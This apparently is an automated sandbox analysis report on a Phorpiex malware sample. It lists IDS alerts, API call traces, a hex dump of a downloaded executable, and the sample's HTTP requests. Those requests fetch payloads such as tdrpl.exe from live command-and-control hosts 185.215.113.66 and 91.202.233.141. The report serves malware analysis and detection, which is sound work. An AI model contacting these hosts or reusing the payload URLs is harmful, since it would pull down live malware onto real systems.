                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,2_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_004067A0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004068E0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,17_2_004068E0
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_004067A0 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,17_2_004067A0

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49734 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:50345 -> 5.75.95.114:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:49731 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49734
                              Source: Network trafficSuricata IDS: 2044077 - Severity 1 - ET MALWARE Win32/Phorpiex UDP Peer-to-Peer CnC : 192.168.2.4:50345 -> 5.239.153.192:40500
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:57562 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 185.215.113.66:80 -> 192.168.2.4:49730
                              Source: Network trafficSuricata IDS: 2848295 - Severity 1 - ETPRO MALWARE Win32/Phorpiex.V CnC Activity M3 : 192.168.2.4:57563 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 185.215.113.66:80 -> 192.168.2.4:49730
                              Source: Network trafficSuricata IDS: 2837677 - Severity 1 - ETPRO MALWARE Phorpiex RC4 Encrypted Payload Inbound via HTTP (512 signature) : 185.215.113.66:80 -> 192.168.2.4:49731
                              Contains functionality to check if Internet connection is working
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com1_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com2_2_0040B430
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_0040B430 htons,socket,connect,getsockname, www.update.microsoft.com17_2_0040B430
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
                              Source: global trafficTCP traffic: 192.168.2.4:49735 -> 2.186.114.89:40500
                              Source: global trafficTCP traffic: 192.168.2.4:57564 -> 2.63.29.22:40500
                              Source: global trafficUDP traffic: 192.168.2.4:50345 -> 5.239.153.192:40500
                              Source: global trafficUDP traffic: 192.168.2.4:50345 -> 5.75.95.114:40500
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Mon, 28 Oct 2024 10:11:12 GMTContent-Type: application/octet-streamContent-Length: 85504Last-Modified: Sun, 20 Oct 2024 18:13:32 GMTConnection: keep-aliveETag: "6715484c-14e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6d bb 70 6a 29 da 1e 39 29 da 1e 39 29 da 1e 39 20 a2 94 39 2e da 1e 39 51 a8 1f 38 2b da 1e 39 ea d5 43 39 2b da 1e 39 ea d5 41 39 28 da 1e 39 ea d5 11 39 2b da 1e 39 0e 1c 73 39 2d da 1e 39 29 da 1f 39 95 da 1e 39 0e 1c 65 39 3c da 1e 39 20 a2 9d 39 2d da 1e 39 20 a2 9a 39 35 da 1e 39 20 a2 8f 39 28 da 1e 39 52 69 63 68 29 da 1e 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a4 84 07 67 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ee 00 00 00 70 00 00 00 00 00 00 40 79 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 70 01 00 00 04 00 00 00 00 00 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 30 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 86 ed 00 00 00 10 00 00 00 ee 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f2 3f 00 00 00 00 01 00 00 40 00 00 00 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 90 2e 00 00 00 40 01 00 00 1c 00 00 00 32 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: Joe Sandbox ViewIP Address: 185.215.113.66 185.215.113.66
                              Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
                              Source: Joe Sandbox ViewIP Address: 91.202.233.141 91.202.233.141
                              Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                              Source: Joe Sandbox ViewASN Name: TCIIR TCIIR
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49734 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 91.202.233.141:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49731 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:57562 -> 185.215.113.66:80
                              Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:57563 -> 185.215.113.66:80
                              Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.66
                              Source: C:\Users\user\Desktop\Bjl3geiFEK.exeCode function: 0_2_004B10B0 Sleep,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,FindWindowA,MoveFileW,DeleteFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_004B10B0
                              Source: global trafficHTTP traffic detected: GET /tdrpl.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /dwntbl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmp, Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drString found in binary or memory: http://185.215.113.66/
                              Source: sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1C:
                              Source: sysppvrdnvs.exe, 00000002.00000003.1903094197.0000000000688000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1903798515.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1G0td
                              Source: sysppvrdnvs.exe, 00000002.00000003.1936945817.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1JJC:
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1LMEM0P
                              Source: sysppvrdnvs.exe, 00000002.00000003.1937078841.0000000000699000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1aenh.dll
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/1uK
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003916309.0000000002EEC000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2(Bf
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2C:
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.00000000006BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/2JJC:
                              Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drString found in binary or memory: http://185.215.113.66/http://91.202.233.141/12345%s%s%s:Zone.Identifier%userprofile%%windir%%s
                              Source: sysppvrdnvs.exeString found in binary or memory: http://185.215.113.66/tdrp.exe
                              Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drString found in binary or memory: http://185.215.113.66/tdrp.exe%s:Zone.Identifier/c
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exe
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exeb1E
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000135B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exek1L
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000130E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.66/tdrpl.exer
                              Source: 33080.scr, 00000001.00000002.1839953222.0000000000410000.00000002.00000001.01000000.00000006.sdmp, 33080.scr, 00000001.00000002.1840086247.000000000042E000.00000004.00000020.00020000.00000000.sdmp, 33080.scr, 00000001.00000000.1806932551.0000000000410000.00000002.00000001.01000000.00000006.sdmp, sysppvrdnvs.exe, 00000002.00000002.2003382841.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000002.00000003.1953713247.00000000048C1000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000000.1827597836.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000002.1976001209.0000000000410000.00000002.00000001.01000000.00000007.sdmp, sysppvrdnvs.exe, 00000011.00000000.1955113533.0000000000410000.00000002.00000001.01000000.00000007.sdmp, 818921588.exe, 00000012.00000002.1995595599.0000000000410000.00000002.00000001.01000000.00000008.sdmp, 818921588.exe, 00000012.00000000.1975136463.0000000000410000.00000002.00000001.01000000.00000008.sdmp, tdrpl[1].exe.0.dr, sysppvrdnvs.exe.1.dr, 33080.scr.0.dr, 818921588.exe.2.drString found in binary or memory: http://91.202.233.141/
                              Source: sysppvrdnvs.exe, 00000002.00000003.1937078841.000000000069F000.00000004.00000020.00020000.00000000.sdmp, sysppvrdnvs.exe, 00000002.00000002.2004958997.0000000005B0D000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbl
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbl2C
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntblan
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.0000000000688000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntblhy
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000061E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntbllvCkd
                              Source: sysppvrdnvs.exe, 00000002.00000002.2003480961.000000000064A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.202.233.141/dwntblt-InLMEMH
                              Source: 818921588.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                              Source: 818921588.exe.2.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                              Source: Bjl3geiFEK.exe, 00000000.00000002.1807520857.000000000136A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00404970
                              Source: C:\Users\user\AppData\Local\Temp\33080.scrCode function: 1_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 2_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00404970
                              Source: C:\Windows\sysppvrdnvs.exeCode function: 17_2_00404970 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,17_2_00404970
